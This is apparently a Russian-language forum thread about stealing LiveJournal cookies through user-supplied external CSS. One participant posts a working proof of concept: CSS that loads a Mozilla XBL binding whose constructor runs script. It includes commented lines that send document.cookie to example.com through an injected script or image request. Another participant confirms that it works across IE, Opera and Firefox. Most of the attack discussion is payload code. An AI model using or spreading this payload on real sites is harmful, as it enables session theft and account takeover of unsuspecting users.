>> Сперва разрешили подключать внешние CSS, в которых может быть скрипт, который в IE может украсть куки.

Почему только в IE?
-moz-binding:url("http://example.com/test.xml#test") !important;

А разве она через границы доменов работает? У IE приходилось код встраивать через expression() или behavior: expression() и писать скрипт внутри CSS'ки, т.к. код хранится на домене, отличном от livejournal.com. С Mozilla я пробовал XBL использовать, но или у меня руки кривые были или тоже ограничения, но ничего не выходило просто.

Когда-то получилось, но на все сто не уверен (в прямизне своих рук тоже сомневаюсь; мог с привелегиями попутать чего). Попробуйте, если интересно:

HTML-<style/>
@import url("http://example.com/test.css");
/* ..OR.. *:root {-moz-binding:url("http://example.com/test.xml#test") !important} */

test.css
*:root {-moz-binding:url("test.xml#test") !important}

test.xml
<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl">
<binding id="test"><implementation>
<constructor><![CDATA[
alert(document.cookie);
//var s = document.createElement("script");
//document.documentElement.appendChild(s);
//s.src = "http://example.com/test.js?cookie="+escape(document.cookie);
//var i = document.createElement("img");
//i.src = "http://example.com/test.png?cookie="+escape(document.cookie);
//document.documentElement.appendChild(i);
]]></constructor>
</implementation></binding>
</bindings>

...и о результатах, если не трудно. Узнать ответ на этот вопрос в любом случае интересно. :)

Сейчас вспомнил, попробовал… А ведь работает, зараза.

Значит и под IE и под Opera и под Fx можно утащить куки из ЖЖ. -_-

О, хорошо. В смысле, ничего хорошего, конечно, а спасибо за подтверждение.